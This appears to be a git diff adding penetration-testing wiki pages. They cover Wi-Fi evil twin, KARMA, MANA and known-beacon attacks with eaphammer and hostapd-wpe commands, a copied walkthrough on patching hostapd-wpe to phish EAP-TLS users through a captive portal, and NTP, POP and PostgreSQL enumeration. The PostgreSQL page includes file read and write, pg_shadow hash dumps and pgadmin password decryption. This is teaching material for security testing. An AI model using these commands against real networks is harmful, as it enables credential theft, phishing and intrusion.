+Notice also that real-world wireless deployments usually have more than a single access point, and these access points are often more powerful and have better line-of-site range due to their placement towards the ceiling. Deauthenticating a single access point usually results in the target roaming towards another valid access point rather than your rogue AP, unless all nearby access points are deauthenticated \(loud\) or you are very careful with the placement of the rogue AP \(difficult\).
+
+You can create a very basic Open Evil Twin \(no capabilities to route traffic to Internet\) doing:
+
+```bash
+airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon
+```
+
+You could also create an Evil Twin using **eaphammer** \(notice that to create evil twins with eaphammer the interface **should NOT be** in **monitor** mode\):
+
+```text
+./eaphammer -i wlan0 --essid exampleCorp --captive-portal
+```
+
+Or using Airgeddon: `Options: 5,6,7,8,9 (inside Evil Twin attack menu).`
+
+![](../../../.gitbook/assets/image%20%2828%29.png)
+
+Please, notice that by default if an ESSID in the PNL is saved as WPA protected, the device won't connect automatically to an Open evil Twin. You can try to DoS the real AP and hope that the user will connect manually to your Open evil twin, or you could DoS the real AP an use a WPA Evil Twin to capture the handshake \(using this method you won't be able to let the victim connect to you as you don't know the PSK, but you can capture the handshake and try to crack it\).
+
+_Some OS and AV will warn the user that connect to an Open network is dangerous..._
+
+### WPA/WPA2 Evil Twin
+
+You can create an **Evil Twin using WPA/2** and if the devices have configured to connect to that SSID with WPA/2, they are going to try to connect. Anyway, **to complete the 4-way-handshake** you also need to **know** the **password** that the client is going to use. If you **don't know** it, the **connection won't be completed**.
+
+```text
+./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"
+```
+
+### Enterprise Evil Twin
+
+To understand this attacks I would recommend to read before the brief [WPA Enterprise explanation](./#wpa-enterprise-mgt).
+
+#### Using hostapd-wpe
+
+`hostapd-wpe` needs a **configuration** file to work. To **automate** the generation if these configurations you could use [https://github.com/WJDigby/apd\_launchpad](https://github.com/WJDigby/apd_launchpad) \(download the python file inside _/etc/hostapd-wpe/_\)
+
+```text
+./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
+hostapd-wpe ./victim/victim.conf -s
+```
+
+In the configuration file you can select a lot of different things like ssid, channel, user files, cret/key, dh parameters, wpa version and auth...
+
+[**Using hostapd-wpe with EAP-TLS to allow any certificate to login.**](evil-twin-eap-tls.md)\*\*\*\*
+
+#### Using EAPHammer
+
+```bash
+# Generate Certificates
+./eaphammer --cert-wizard
+
+# Launch Attack
+./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds
+```
+
+By default, EAPHammer purposes this authentication methods \(notice GTC as the first one to try to obtain plaintext passwords and then the use of more robust auth methods\):
+
+```text
+GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5
+```
+
+This is the default methodology to avoid long connection times. However, you can also specify to server the authentication methods from weakest to strongest:
+
+```text
+--negotiate weakest
+```
+
+Or you could also use:
+
+* `--negotiate gtc-downgrade` to use highly efficient GTC downgrade implementation \(plaintext passwords\)
+* `--negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP` to specify manually the methods offered \(offering the same auth methods in the same order as the organisation the attack will be much more difficult to detect\).
+* [Find more info in the wiki](http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/)
+
+#### Using Airgeddon
+
+`Airgeddon` can use previously generated certificated to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to **capture the user and the MD5 of the password**. Later, the attacker can try to crack the password.  
+`Airggedon` offers you the possibility of a **continuous Evil Twin attack \(noisy\)** or **only create the Evil Attack until someone connects \(smooth\).**
+
+![](../../../.gitbook/assets/image%20%28189%29.png)
+
+### Debugging PEAP and EAP-TTLS TLS tunnels in Evil Twins attacks
+
+_This method was tested in an PEAP connection but as I'm decrypting an arbitrary TLS tunnel this should also works with EAP-TTLS_
+
+Inside the **configuration** of _hostapd-wpe_ **comment** the line that contains _**dh\_file**_ \(from `dh_file=/etc/hostapd-wpe/certs/dh` to `#dh_file=/etc/hostapd-wpe/certs/dh`\)  
+This will make `hostapd-wpe` to **exchange keys using RSA** instead of DH, so you will be able to **decrypt** the traffic later **knowing the servers private key**.
+
+Now start the **Evil Twin** using **`hostapd-wpe`** with that modified configuration as usual. Also, start **`wireshark`** in the **interface** which is performing the Evil Twin attack.
+
+Now or later \(when you have already captured some authentication intents\) you can add the private RSA key to wireshark in: `Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...`
+
+Add a new entry and fill the form with this values: **IP address = any** -- **Port = 0** -- **Protocol = data** -- **Key File** \(**select your key file**, to avoid problems select a key file **without being password protected**\).
+
+![](../../../.gitbook/assets/image.png)
+
+And look at the new **"Decrypted TLS" tab**:
+
+![](../../../.gitbook/assets/image%20%28306%29.png)
+
+## KARMA, MANA, Loud MANA and Known beacons attack
+
+### ESSID and MAC black/whitelists
+
+The following table lists the different type of MFACLs \(Management Frame Access Control Lists\) available, as well their effects when used:
+
+![](../../../.gitbook/assets/image%20%28135%29.png)
+
+```text
+# example EAPHammer MFACL file, wildcards can be used
+78:f0:97:fc:b5:36
+9a:35:e1:01:4f:cf
+69:19:14:60:20:45
+ce:52:b8:*:*:*
+
+[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
+[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]
+```
+
+```text
+# example ESSID-based MFACL file
+apples
+oranges
+grapes
+pears
+
+[--ssid-whitelist /path/to/mac/whitelist/file.txt]
+[--ssid-blacklist /path/to/mac/blacklist/file.txt]
+```
+
+### KARMA
+
+Karma attacks are a second form of rogue access point attack that exploits the network selection process used by stations. In a whitepaper written in 2005, Dino Dai Zovi and Shane Macaulay describe how an attacker can configure an access point to listen for directed probe requests and respond to all of them with matching directed probe responses. This causes the affected stations to automatically send an association request to the attacker’s access point. The access point then replies with an association response, causing the affected stations to connect to the attacker.
+
+### MANA
+
+According to Ian de Villiers and Dominic White, modern stations are designed to protect themselves against karma attacks by ignoring directed probe responses from access points that have not already responded to at least one broadcast probe request. This led to a significant drop in the number of stations that were vulnerable to karma attacks until 2015, when White and de Villiers developed a means of circumventing such protections. In White’s and de Villiers’ improved karma attack \(MANA attack\), directed probe responses are used to reconstruct the PNLs of nearby stations. When a broadcast probe request is received from a station, the attacker’s access point responds with an arbitrary SSID from the station’s PNL already being saw in a direct probe from that device.
+
+In resume, the MANA algorithm works like this: each time the access point receives a probe request, it first determines whether it’s a broadcast or directed probe. If it’s directed probe, the sender’s MAC address is added to the hash table \(if it’s not there already\) and the ESSID is added to that device’s PNL. The AP then responds with a directed probe response. If it’s a broadcast probe, the access point responds with probe responses for each of the networks in that device’s PNL.
+
+MANA attack using eaphammer:
+
+```text
+./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]
+```
+
+### Loud MANA
+
+Notice that the standard MANA attack still does not allow us to attack devices that don’t use directed probing at all. So if we also doesn't know previously any entry inside the device PNL, we need to figure out some other way to attack it.
+
+A possibility is what is called Loud MANA attack. This attack relies on the idea that client devices within close physical proximity to one another are likely to have at least some common entries in their PNLs.
+
+In resume, Loud MANA attack instead of responding to probe requests with each ESSID in a particular device’s PNL, the rogue AP sends probe responses for every ESSID in every PNL across all devices that it has seen before. Relating this to set theory, we can say that the AP sends probe responses for each ESSID in the union of all PNLs of nearby devices.
+
+```text
+./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]
+```
+
+### Known Beacon attack
+
+There are still cases in which Loud MANA attack won’t succeed.  
+The Known Beacon attack is a way to "Brute-Force" ESSIDs to try to get the victim connect to the attacker. The attacker creates an AP that response to any ESSID and run some code sending beacons faking ESSIDs of each name inside a wordlist. Hopefully the victim will contains some of theses ESSID names inside its PNL and will try to connect to the fake AP.  
+Eaphammer implemented this attack as a  MANA attack where all the ESSIDs inside a list are charged \(you could also combine this with `--loud` to create a Loud MANA + Known beacons attack\):
+
+```text
+./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]
+```
+
+#### Known Beacon Burst attack
+
+As known beacons are loud. You can use a script inside Eaphammer project to just launch beacouns of every ESSID name inside a file very quickly. If you combines this script with a Eaphammer MANA attack, the clients will be able to connect to your AP.
+
+```text
+# transmit a burst of 5 forged beacon packets for each entry in list
+./forge-beacons -i wlan1 \
+ --bssid de:ad:be:ef:13:37 \
+ --known-essids-file known-s.txt \
+ --dst-addr 11:22:33:11:22:33 \
+ --burst-count 5
+```
+
+## Other tools
+
+### [Wifite2](https://github.com/derv82/wifite2)
+
+This tool automates **WPS/WEP/WPA-PSK** attacks. It will automatically:
+
+* Set the interface in monitor mode
+* Scan for possible networks - And let you select the victim\(s\)
+* If WEP - Launch WEP attacks
+* If WPA-PSK
+  * If WPS: Pixie dust attack and the bruteforce attack \(be careful the brute-force attack could take a long time\). Notice that it doesn't try null PIN or database/generated PINs.
+  * Try to capture the PMKID from the AP to crack it
+  * Try to deauthenticate clients of the AP to capture a handshake
+  * If PMKID or Handshake, try to bruteforce using top5000 passwords.
+
+## Interesting links
+
+* [https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee](https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee)
+* [https://posts.specterops.io/modern-wireless-attacks-pt-ii-mana-and-known-beacon-attacks-97a359d385f9](https://posts.specterops.io/modern-wireless-attacks-pt-ii-mana-and-known-beacon-attacks-97a359d385f9)
+* [https://posts.specterops.io/modern-wireless-tradecraft-pt-iii-management-frame-access-control-lists-mfacls-22ca7f314a38](https://posts.specterops.io/modern-wireless-tradecraft-pt-iii-management-frame-access-control-lists-mfacls-22ca7f314a38)
+* [https://posts.specterops.io/modern-wireless-tradecraft-pt-iv-tradecraft-and-detection-d1a95da4bb4d](https://posts.specterops.io/modern-wireless-tradecraft-pt-iv-tradecraft-and-detection-d1a95da4bb4d)
+* [https://github.com/gdssecurity/Whitepapers/blob/master/GDS%20Labs%20-%20Identifying%20Rogue%20Access%20Point%20Attacks%20Using%20Probe%20Response%20Patterns%20and%20Signal%20Strength.pdf](https://github.com/gdssecurity/Whitepapers/blob/master/GDS%20Labs%20-%20Identifying%20Rogue%20Access%20Point%20Attacks%20Using%20Probe%20Response%20Patterns%20and%20Signal%20Strength.pdf)
+* [http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/](http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/)
+* [https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/](https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/)
+* [https://medium.com/hacking-info-sec/ataque-clientless-a-wpa-wpa2-usando-pmkid-1147d72f464d](https://medium.com/hacking-info-sec/ataque-clientless-a-wpa-wpa2-usando-pmkid-1147d72f464d)
+
+TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) \(login con facebook e imitacionde WPA en captive portals\)
+
diff --git a/pentesting/pentesting-network/wifi-attacks/evil-twin-eap-tls.md b/pentesting/pentesting-network/wifi-attacks/evil-twin-eap-tls.md
new file mode 100644
index 00000000..083a02d3
--- /dev/null
+++ b/pentesting/pentesting-network/wifi-attacks/evil-twin-eap-tls.md
@@ -0,0 +1,120 @@
+# Evil Twin EAP-TLS
+
+At some point I needed to use the proposed solution by the post bellow but the steps in [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) wasn't working in modern kali \(2019v3\) anymore.  
+Anyway, it's easy to make them work.   
+You only need to download the hostapd-2.6 from here: [https://w1.fi/releases/](https://w1.fi/releases/) and before compiling again hostapd-wpe install: `apt-get install libssl1.0-dev`
+
+## Evil Twin for EAP-TLS
+
+**This post was copied from** [**https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/**](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/)\*\*\*\*
+
+### The Uncommon Case: Attacking EAP-TLS
+
+Earlier I mentioned a less common wireless network configuration that we had to deal with during this project. This scheme is based on EAP-TLS, where the supplicant will have to present a valid client certificate to the authentication server before being granted access to the network.
+
+In this scenario, the secure TLS channel will only be created if the mutual authentication process goes well. In other words, if the supplicant first accepts the certificate of the authentication server and then the authentication server accepts the certificate of the supplicant.
+
+During the assessment, we were surprised by an error message obtained when using hostapd-wpe in our attacking machine:
+
+![hostapd-wpe error](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.20.32-PM.png)
+
+As you can see in the error message, our tool is triggering an error message indicating it did not accept the certificate of the Wireless client because it is signed by an unknown CA. Hilarious, right? Our attacking tool is denying access to the victim because the user is not providing valid credentials. 🙂
+
+So, judging by the output of the tool, we can see that the negotiation reached the point where the client certificate was indeed presented to the fake Radius server, which means that the fake certificate forged by the attacker was accepted by the victim.
+
+This means that the supplicant configuration was too lax, and it was accepting any certificate from the radius server.
+
+After seeing this error and searching the Web, we realized it was not that common to exploit this scenario -judging by the lack of information on blogs related to this matter – and that we had to deal with it somehow.
+
+### [MiTM Attack – Defining the Objective](https://versprite.com/tag/mitm/)
+
+As you might have guessed already, the idea here is to tweak our tool to make it accept any certificate provided by occasional supplicants to let the victim establish a full connection with our malicious Wireless infrastructure and then [perform a man-in-the-middle attack](https://versprite.com/tag/mitm/) between the victim and the Internet, showing a captive portal to capture plaintext credentials as a first step.
+
+Note: Of course, when the MiTM attack is fully functional, you can redirect all of the victim’s traffic to your host to capture NetNTLM hashes, for example. We also walkthrough a similar attack in the following post: [MiTM Attack Between Target Windows Machines and a DNS Server](https://versprite.com/blog/mitm-dns-spoofing/).
+
+In both scenarios, we first need to understand where the certificate control is being performed by hostapd-wpe and then modify it accordingly to prevent it from rejecting the invalid or unknown client certificates.
+
+After a quick analysis of the source code, we found the following:
+
+**Original Source Code File: hostapd-2.6/src/eap\_server/eap\_server\_tls.c**
+
+![eap\_server\_tls\_ssl\_init](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.20.41-PM.png)
+
+As you can see in the code above \(line 80\), the EAP TLS server implementation on hostapd invokes a custom function named eap\_server\_tls\_ssl\_init to initialize the server, and the third parameter is set to 1.
+
+**Original Source Code File: hostapd-2.6/src/eap\_server/eap\_server\_tls\_common.c**
+
+![tls\_connection\_set\_verify-1](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.27.49-PM.png)
+
+![tls\_connection\_set\_verify-2](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.28.02-PM.png)
+
+In the code above \(lines from 78 to 80\), we can observe the invocation of the function `tls_connection_set_verify` with the parameter `verify_peer` set to 1 \(this was received from the `eap_tls_init function`\).
+
+**Original Source Code File: hostapd-2.6/src/crypto/tls\_openssl.c**
+
+![verify\_peer](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.32.53-PM.png)
+
+On the code above \(from line 2307 to 2309\), we can observe that the parameter `verify_peer` \(originally set to 1\) will be eventually used as a parameter of the OpenSSL function SSL\_set\_verify to make it validate the client certificate or not when the library is working as a server. By modifying the original line to 0, we can change the behavior of the tool and make it ignore whether the client certificate is valid or not.
+
+**Modified Source Code File: hostapd-2.6/src/eap\_server/eap\_server\_tls.c**
+
+![eap\_tls\_init](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.34.01-PM.png)
+
+After patching the source code of hostapd-wpe and recompiling, we tried the attack again and got the following output:
+
+![patching hostapd-wpe](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.34.54-PM.png)
+
+By observing the output of our modified version of hostapd-wpe, we can see that the error message is not there anymore, and the client appears to be connected to our fake AP. Now, we should build the adequate infrastructure to present a captive portal to the victim and attempt a phishing attack.
+
+To quickly leverage it, we decided to take the portion of the code from Wifiphisher and adapt it for our particular needs, creating a rudimentary captive portal in Python. A link to the code for this Proof-of-Concept can be found on the references.
+
+Now that we have all the elements, let’s perform the attack against a victim and see how all this would be from an attacker perspective:
+
+#### 1. Let’s check the environment with airodump-ng
+
+![airodump-ng](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.35.48-PM.png)
+
+From the output, we can identify the access point BSSID \(F4:EC:38:FA:E7:57\) to which our victim \(00:0F:60:07:95:D7\) is connected to the WPA2-enterprise network named “enterprise” \(ESSID\).
+
+#### 2. Run the modified hostapd-wpe tool to create a fake AP for the target network
+
+![modified modified hostapd-wpe](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.36.29-PM.png)
+
+#### 3. Customize the captive portal template \(e.g. HTML login\) to make it familiar for your target audience \(victims\) and run it
+
+![Customize the captive portal](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.37.02-PM.png)
+
+#### 4. Perform a de-auth attack and assume the risk \(if you are impatient\)
+
+![de-auth attack](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.37.36-PM.png)
+
+As a result, we will see on the modified hostapd-wpe tool’s output the following messages:
+
+![victim connected](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.38.09-PM.png)
+
+This suggests a victim \(00:0f:60:07:95:d7\) has connected to our fake AP.
+
+On the victim’s Windows host, we observe it automatically connected to the fake AP, and as soon as web navigation is tried, the user is presented  the captive portal:
+
+![captive portal credentials](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.38.54-PM.png)
+
+After the victim has entered her credentials, we can see the output on the captive portal’s console:
+
+![captive portal console](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.39.01-PM.png)
+
+The following screenshot shows the message shown to the victim when performing the attack to an iPhone device connected to a WPA2 network, requesting the victim to accept the certificate:
+
+![accept certificate](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.39.11-PM.png)
+
+The following screenshot shows the captive portal presented to the iPhone device:
+
+![iphone credentials](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.39.19-PM.png)
+
+Note: The Captive Portal HTML template drafted for this demo is just a Proof-of-Concept sample, and I encourage you to develop your own, including HTML tags searching for files on the network that allows you to capture NetNTLM hashes \(if the victim is using Internet Explorer\), as long as others more sophisticated that requires the user to download a binary on the computer to scan for issues before allowing access to the network.
+
+Although we can read different online articles stating that EAP-TLS is the most secure implementation for Wireless infrastructures, it is not used by most companies due to its scalability problems: the complexity of creating, delivering, configuring, and revoking a unique certificate per user.
+
+The whole security of this scheme relies, again, on the weakest link in the chain, which might be a device or host configured to accept any certificate presented by the authentication server or a mobile device used by an unconscious user that accepts it without considering the risk of this action.
+
+
+
diff --git a/pentesting/pentesting-ntp.md b/pentesting/pentesting-ntp.md
new file mode 100644
index 00000000..53588576
--- /dev/null
+++ b/pentesting/pentesting-ntp.md
@@ -0,0 +1,45 @@
+# 123/udp - Pentesting NTP
+
+## Basic Information
+
+ The Network Time Protocol \(**NTP**\) is a networking protocol for clock synchronization between computer systems over packet-switched, variable-latency data networks.
+
+**Default port:** 123/udp
+
+```text
+PORT    STATE SERVICE REASON
+123/udp open  ntp     udp-response
+```
+
+## Enumeration
+
+```bash
+ntpq -c readlist <IP_ADDRESS>
+ntpq -c readvar <IP_ADDRESS>
+ntpq -c monlist <IP_ADDRESS>
+ntpq -c peers <IP_ADDRESS>
+ntpq -c listpeers <IP_ADDRESS>
+ntpq -c associations <IP_ADDRESS>
+ntpq -c sysinfo <IP_ADDRESS>
+```
+
+```bash
+nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 <IP>
+```
+
+## Examine configuration files
+
+* ntp.conf
+
+## NTP Amplification Attack
+
+\*\*\*\*[**How NTP DDoS Attack Works**](https://resources.infosecinstitute.com/network-time-protocol-ntp-threats-countermeasures/#gref)
+
+NTP protocol by design uses UDP to operate, which does not require any handshake like TCP, thus no record of the request. So, NTP DDoS amplification attack begins when an attacker crafts packets with a spoofed source IP to make the packets appear to be coming from the intended target and sends them to NTP server. Attacker initially crafts the packet of few bytes, but NTP responds with a large amount of data thus adding to amplification of this attack.
+
+_MONLIST command_: It is a NTP protocol command which has very little use, but it is this command which is the main culprit for this attack. However, the use of MONLIST command is to give details of the last 600 clients that have connected to the NTP time service. Below is the command syntax:
+
+```bash
+ntpdc -n –c monlist <IP or hostname of time server>
+```
+
diff --git a/pentesting/pentesting-pop.md b/pentesting/pentesting-pop.md
new file mode 100644
index 00000000..8527b4b9
--- /dev/null
+++ b/pentesting/pentesting-pop.md
@@ -0,0 +1,83 @@
+# 110,995 - Pentesting POP
+
+## Basic Information
+
+**Post Office Protocol** \(**POP**\) is a type of computer networking and Internet standard **protocol** that extracts and retrieves email from a remote mail server for access by the host machine. **POP** is an application layer **protocol** in the OSI model that provides end users the ability to fetch and receive email \(from [here](https://www.techopedia.com/definition/5383/post-office-protocol-pop)\).
+
+The POP clients generally connect, retrieve all messages, store them on the client system, and delete them from the server. There are 3 versions of POP, but POP3 is the most used one.
+
+**Default ports:** 110, 995\(ssl\)
+
+```text
+PORT    STATE SERVICE
+110/tcp open  pop3
+```
+
+## Enumeration
+
+### Banner Grabbing
+
+```bash
+nc -nv <IP> 110
+openssl s_client -connect <IP>:995 -crlf -quiet
+```
+
+## Manual
+
+You can use the command `CAPA` to obtain the capabilities of the POP3 server.
+
+## Automated
+
+```bash
+nmap --scripts "pop3-capabilities or pop3-ntlm-info" -sV -port <PORT> <IP> #All are default scripts
+```
+
+The `pop3-ntlm-info` plugin will return some "**sensitive**" data \(Windows versions\).
+
+### [POP3 bruteforce](../brute-force.md#pop)
+
+## POP syntax
+
+```bash
+POP commands:
+  USER uid           Log in as "uid"
+  PASS password      Substitue "password" for your actual password
+  STAT               List number of messages, total mailbox size
+  LIST               List messages and sizes
+  RETR n             Show message n
+  DELE n             Mark message n for deletion
+  RSET               Undo any changes
+  QUIT               Logout (expunges messages if no RSET)
+  TOP msg n          Show first n lines of message number msg
+  CAPA               Get capabilities
+```
+
+From [here](http://sunnyoasis.com/services/emailviatelnet.html)
+
+Example:
+
+```text
+root@kali:~# telnet $ip 110
+ +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready 
+ USER billydean    
+ +OK
+ PASS password
+ +OK Welcome billydean
+ 
+ list
+ 
+ +OK 2 1807
+ 1 786
+ 2 1021
+
+ retr 1
+ 
+ +OK Message follows
+ From: jamesbrown@motown.com
+ Dear Billy Dean,
+
+ Here is your login for remote desktop ... try not to forget it this time!
+ username: billydean
+ password: PA$$W0RD!Z
+```
+
diff --git a/pentesting/pentesting-postgresql.md b/pentesting/pentesting-postgresql.md
new file mode 100644
index 00000000..576496d1
--- /dev/null
+++ b/pentesting/pentesting-postgresql.md
@@ -0,0 +1,129 @@
+# 5432,5433 - Pentesting Postgresql
+
+## **Basic Information**
+
+**PostgreQSL** is an ****open source object-relational database system that uses and extends the SQL language.
+
+**Default port:**  5432, and if this port is already in use it seems that postgresql will use the next port \(5433 probably\) which is not in use.
+
+```text
+PORT     STATE SERVICE
+5432/tcp open  pgsql
+```
+
+## Connect
+
+```bash
+psql -U <myuser> # Open psql console with user
+psql -h <host< -U <username> -d <database> # Remote connection
+psql -h <host> -p <port> -U <username> -W <password> <database> # Remote connection
+```
+
+```sql
+psql -h localhost -d <database_name> -U <User> #Password will be prompted
+\list # List databases
+\c <database> # use the database
+\d # List tables
+\du+ # Get users roles
+
+#Read a file
+CREATE TABLE demo(t text);
+COPY demo from '[FILENAME]';
+SELECT * FROM demo;
+
+#Write ascii to a file (copy to cannot copy binary data)
+COPY (select convert_from(decode('<B64 payload>','base64'),'utf-8')) to 'C:\\some\\interesting\path.cmd'; 
+
+#List databases
+SELECT datname FROM pg_database;
+
+#Read credentials (usernames + pwd hash)
+SELECT usename, passwd from pg_shadow;
+
+#Check if current user is superiser
+SELECT current_setting('is_superuser'); #If response is "on" then true, if "off" then false
+
+#Check if plpgsql is enabled
+SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql'
+
+#Change password
+ALTER USER user_name WITH PASSWORD 'new_password';
+
+#Check users privileges over a table (pg_shadow on this example)
+SELECT grantee, privilege_type 
+FROM information_schema.role_table_grants 
+WHERE table_name='pg_shadow'
+
+#Get users roles
+SELECT 
+      r.rolname, 
+      r.rolsuper, 
+      r.rolinherit,
+      r.rolcreaterole,
+      r.rolcreatedb,
+      r.rolcanlogin,
+      r.rolconnlimit, r.rolvaliduntil,
+  ARRAY(SELECT b.rolname
+        FROM pg_catalog.pg_auth_members m
+        JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)
+        WHERE m.member = r.oid) as memberof
+, r.rolreplication
+FROM pg_catalog.pg_roles r
+ORDER BY 1;
+```
+
+## Enumeration
+
+```text
+msf> use auxiliary/scanner/postgres/postgres_version
+msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection
+```
+
+### \*\*\*\*[**Brute force**](../brute-force.md#postgresql)
+
+Client authentication is controlled by a config file frequently named _**pg\_hba.conf**_. This file has a set of records. A record may have one of the following seven formats:
+
+![](https://lh4.googleusercontent.com/Ff8YbD3ppYmN2Omp-4M-0AAVhLsr4c2i7d7HUjgkE-O6NZ5zbaST1hdMPrp1AL_xTXJalYe0HYxUk76vWJUfHZ5GuCDvIL1A-sMV44Z0CYSVgLM9ttFTDu-BhzewBGc7FeMarTLqsu_N1ztXJg)
+
+**Each** record **specifies** a **connection type**, a **client IP address range** \(if relevant for the connection type\), a **database name**, a **user name**, and the **authentication method** to be used for connections matching these parameters. The **first record with a match**ing connection type, client address, requested database, and user name **is used** to perform authentication. There is no "fall-through" or "backup": **if one record is chosen and the authentication fails, subsequent records are not considered**. If no record matches, access is denied.  
+The **password-based** authentication methods are **md5**, **crypt**, and **password**. These methods operate similarly except for the way that the password is sent across the connection: respectively, MD5-hashed, crypt-encrypted, and clear-text. A limitation is that the crypt method does not work with passwords that have been encrypted in pg\_authid.  
+
+
+## **POST**
+
+```text
+msf> use auxiliary/scanner/postgres/postgres_hashdump
+msf> use auxiliary/scanner/postgres/postgres_schemadump
+msf> use auxiliary/admin/postgres/postgres_readfile
+msf> use exploit/linux/postgres/postgres_payload
+msf> use exploit/windows/postgres/postgres_payload
+```
+
+### logging
+
+Inside the _**postgresql.conf**_ file you can enable postgresql logs changing:
+
+```bash
+log_statement = 'all'
+log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log'
+logging_collector = on
+sudo service postgresql restart
+#Find the logs in /var/lib/postgresql/<PG_Version>/main/log/
+#or in /var/lib/postgresql/<PG_Version>/main/pg_log/
+```
+
+Then, **restart the service**.
+
+### pgadmin
+
+[pgadmin](https://www.pgadmin.org/) is an administration and development platform for PostgreSQL.  
+You can find **passwords** inside the _**pgadmin4.db**_ file  
+You can decrypt them using the _**decrypt**_ function inside the script: [https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py)
+
+```bash
+sqlite3 pgadmin4.db ".schema"
+sqlite3 pgadmin4.db "select * from user;"
+sqlite3 pgadmin4.db "select * from server;"
+string pgadmin4.db
+```
+
diff --git a/pentesting/pentesting-printers/README.md b/pentesting/pentesting-printers/README.md
new file mode 100644
index 00000000..440fea24
--- /dev/null
+++ b/pentesting/pentesting-printers/README.md
@@ -0,0 +1,215 @@
+# Pentesting Printers
+
+Please, note that **most of the content of all the info related to** _**Pentesting Printers**_ ****was taken **from** the **huge** and **amazing research** you can find on [**http://hacking-printers.net/**](http://hacking-printers.net/). I tried to **summarise** that information here but you can always **go to the source to learn more about the topic**.
+
+## Fundamentals
+
+A schematic relationship regarding the encapsulation of printer languages is given below:  
+
+
+![Encapsulation of printer languages](http://hacking-printers.net/wiki/images/thumb/1/1d/Protocols.png/500px-Protocols.png)
+
+## Network printing protocols
+
+**Sending data** to a printer device can be done by **USB/parallel cable** or over a **network**. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [_NCP_](https://en.wikipedia.org/wiki/NetWare_Core_Protocol) or [_AppleTalk_](https://en.wikipedia.org/wiki/AppleTalk). In the Windows world, _SMB/CIFS_ printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as _FTP_ or _HTTP_ file uploads. The **most common printing protocols** supported directly by **network** printers however are _**LPD**_**,** _**IPP**_**, and** _**raw port 9100**_ printing. **Network printing protocols can be attacked directly**, for example by exploiting a buffer overflow in the printer's LPD daemon. In many attack scenarios however, they only act as a **carrier/channel** to **deploy malicious Printer language code**. Note that a **network printer usually supports multiple protocols to ‘print’** a document which broadens the attack surface.
+
+### **Learn more about** [**raw port 9100 here**](../9100-pjl.md)**.**
+
+### **Learn more about** [**LDP in Pentesting 515 here**](../515-pentesting-line-printer-daemon-lpd.md)**.**
+
+### **Learn more about** [**IPP in Petesting 631 here**](../pentesting-631-internet-printing-protocol-ipp.md)**.**
+
+## Printer Control Languages
+
